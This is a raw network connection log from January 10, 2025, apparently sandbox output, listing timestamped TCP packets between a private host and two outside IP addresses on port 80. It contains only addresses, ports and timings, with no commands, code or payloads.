Jan 10, 2025 08:59:25.050957918 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.050990105 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051023006 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051028013 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051054001 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051075935 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051090956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051121950 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051132917 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051156044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051187038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051197052 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051218987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051253080 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051285982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051294088 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051347971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051348925 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051381111 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051424026 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051429987 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051462889 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051495075 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051506996 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051527023 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051558971 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051573038 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051609993 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051644087 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051652908 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051676035 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051707983 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051721096 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051740885 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051772118 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051776886 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051803112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051835060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051847935 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051867962 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051901102 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051914930 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.051934004 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051969051 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.051983118 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052104950 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052136898 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052160025 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052170038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052201986 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052228928 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052234888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052268982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052301884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052299976 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052334070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052366018 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052366972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052398920 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052422047 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.052432060 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.052474976 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213021040 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213090897 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213129044 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213180065 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213238955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213268995 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213289976 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213324070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213356972 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213390112 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213421106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213470936 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213483095 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213484049 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213484049 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213504076 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213521957 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213538885 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213572979 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213604927 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213606119 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213660955 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213668108 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213696003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213728905 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213740110 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213759899 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213792086 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213829994 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213855028 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213888884 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213913918 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.213921070 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213953018 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.213984966 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214018106 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214050055 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214056015 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214082003 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214129925 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214162111 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214162111 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214194059 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214226007 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214257956 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214286089 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214289904 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214322090 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214354038 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214380980 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214385986 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214418888 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214422941 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214452982 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214484930 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214505911 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214538097 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214570045 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214601994 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214622021 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:25.214637041 CET	80	49736	147.124.216.113	192.168.2.4
Jan 10, 2025 08:59:25.214715958 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 08:59:26.026748896 CET	49751	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.032625914 CET	80	49751	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:26.032727957 CET	49751	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.032896042 CET	49751	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.037787914 CET	80	49751	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:26.037870884 CET	49751	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.120893955 CET	49752	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.126274109 CET	80	49752	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:26.126398087 CET	49752	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.133274078 CET	49752	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:26.138402939 CET	80	49752	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.068224907 CET	80	49752	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.068283081 CET	80	49752	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.068363905 CET	49752	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.216299057 CET	49752	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.221113920 CET	80	49752	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.386746883 CET	49753	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.391587019 CET	80	49753	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.391655922 CET	49753	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.391916037 CET	49753	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.395328999 CET	49754	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.396660089 CET	80	49753	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.396704912 CET	49753	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.400142908 CET	80	49754	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:27.400214911 CET	49754	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.400490046 CET	49754	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:27.405188084 CET	80	49754	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.327038050 CET	80	49754	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.327250957 CET	80	49754	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.327358961 CET	49754	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.327645063 CET	49754	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.332534075 CET	80	49754	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.496134043 CET	49755	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.501291990 CET	80	49755	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.501451969 CET	49755	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.501621008 CET	49755	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.504400015 CET	49756	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.506545067 CET	80	49755	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.506624937 CET	49755	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.509255886 CET	80	49756	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:28.509351969 CET	49756	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.509505033 CET	49756	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:28.514727116 CET	80	49756	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.414518118 CET	80	49756	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.414578915 CET	80	49756	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.414704084 CET	49756	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.414793015 CET	49756	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.419771910 CET	80	49756	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.573132992 CET	49758	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.578702927 CET	80	49758	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.578931093 CET	49758	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.599260092 CET	49758	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.605102062 CET	80	49758	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.605228901 CET	49758	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.608093023 CET	49759	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.613676071 CET	80	49759	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:29.613827944 CET	49759	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.620853901 CET	49759	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:29.626498938 CET	80	49759	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.535300970 CET	80	49759	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.535393953 CET	80	49759	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.535502911 CET	49759	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.535599947 CET	49759	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.540508986 CET	80	49759	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.680259943 CET	49760	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.685178041 CET	80	49760	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.685275078 CET	49760	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.685444117 CET	49760	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.688024044 CET	49761	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.690382004 CET	80	49760	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.690452099 CET	49760	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.692874908 CET	80	49761	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:30.692964077 CET	49761	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.693134069 CET	49761	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:30.698014021 CET	80	49761	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.611861944 CET	80	49761	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.612157106 CET	80	49761	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.612261057 CET	49761	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.612261057 CET	49761	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.617141008 CET	80	49761	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.760806084 CET	49762	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.765746117 CET	80	49762	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.765846968 CET	49762	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.765976906 CET	49762	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.768572092 CET	49763	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.770894051 CET	80	49762	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.770953894 CET	49762	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.773416042 CET	80	49763	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:31.773480892 CET	49763	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.773597956 CET	49763	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:31.778434992 CET	80	49763	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.711414099 CET	80	49763	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.711477041 CET	80	49763	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.711637974 CET	49763	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.713886976 CET	49763	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.718713045 CET	80	49763	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.855375051 CET	49764	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.861694098 CET	80	49764	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.861776114 CET	49764	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.862011909 CET	49764	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.864200115 CET	49765	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.868776083 CET	80	49764	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.868833065 CET	49764	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.871058941 CET	80	49765	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:32.871138096 CET	49765	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.871587992 CET	49765	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:32.878452063 CET	80	49765	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.779359102 CET	80	49765	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.779485941 CET	80	49765	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.779542923 CET	49765	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.779627085 CET	49765	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.784492016 CET	80	49765	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.908114910 CET	49766	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.913131952 CET	80	49766	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.913361073 CET	49766	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.913361073 CET	49766	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.915070057 CET	49767	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.918376923 CET	80	49766	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.918452978 CET	49766	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.919966936 CET	80	49767	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:33.920038939 CET	49767	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.920243025 CET	49767	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:33.925132036 CET	80	49767	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:34.882731915 CET	80	49767	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:34.883143902 CET	80	49767	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:34.883198023 CET	49767	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:34.888987064 CET	49767	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:34.893944979 CET	80	49767	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.032440901 CET	49769	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.037400961 CET	80	49769	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.037478924 CET	49769	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.037672997 CET	49769	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.039938927 CET	49770	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.042593956 CET	80	49769	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.042649031 CET	49769	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.044841051 CET	80	49770	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.044928074 CET	49770	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.045032024 CET	49770	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.049865961 CET	80	49770	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.969995975 CET	80	49770	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.970118046 CET	80	49770	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:35.970185041 CET	49770	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.970269918 CET	49770	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:35.975131989 CET	80	49770	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:36.095944881 CET	49771	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.101073027 CET	80	49771	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:36.101187944 CET	49771	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.101339102 CET	49771	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.106339931 CET	80	49771	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:36.106408119 CET	49771	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.125662088 CET	49772	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.130492926 CET	80	49772	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:36.130597115 CET	49772	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.130758047 CET	49772	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:36.135561943 CET	80	49772	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.051531076 CET	80	49772	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.051774025 CET	80	49772	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.051853895 CET	49772	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.052009106 CET	49772	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.057748079 CET	80	49772	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.183264017 CET	49773	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.188167095 CET	80	49773	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.188373089 CET	49773	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.188474894 CET	49773	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.190498114 CET	49774	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.193341970 CET	80	49773	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.193408012 CET	49773	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.195303917 CET	80	49774	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:37.195390940 CET	49774	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.195750952 CET	49774	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:37.200556993 CET	80	49774	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.143450022 CET	80	49774	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.143959045 CET	80	49774	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.144165039 CET	49774	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.144165993 CET	49774	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.149570942 CET	80	49774	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.282377005 CET	49776	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.287457943 CET	80	49776	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.287703991 CET	49776	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.287864923 CET	49776	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.290361881 CET	49777	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.292819023 CET	80	49776	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.292889118 CET	49776	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.295281887 CET	80	49777	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:38.295469999 CET	49777	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.295550108 CET	49777	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:38.300478935 CET	80	49777	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.232263088 CET	80	49777	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.232682943 CET	80	49777	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.232762098 CET	49777	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.232948065 CET	49777	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.237848997 CET	80	49777	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.374747992 CET	49786	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.379668951 CET	80	49786	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.379759073 CET	49786	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.379914045 CET	49786	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.382334948 CET	49787	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.384764910 CET	80	49786	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.384834051 CET	49786	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.387300014 CET	80	49787	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:39.387450933 CET	49787	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.387639046 CET	49787	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:39.392535925 CET	80	49787	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.314548016 CET	80	49787	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.314907074 CET	80	49787	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.314971924 CET	49787	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.315006971 CET	49787	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.319881916 CET	80	49787	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.442383051 CET	49795	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.447238922 CET	80	49795	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.447360992 CET	49795	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.447509050 CET	49795	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.452488899 CET	80	49795	166.62.27.188	192.168.2.4
Jan 10, 2025 08:59:40.452533960 CET	49795	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.471227884 CET	49796	80	192.168.2.4	166.62.27.188
Jan 10, 2025 08:59:40.476058006 CET	80	49796	166.62.27.188	192.168.2.4
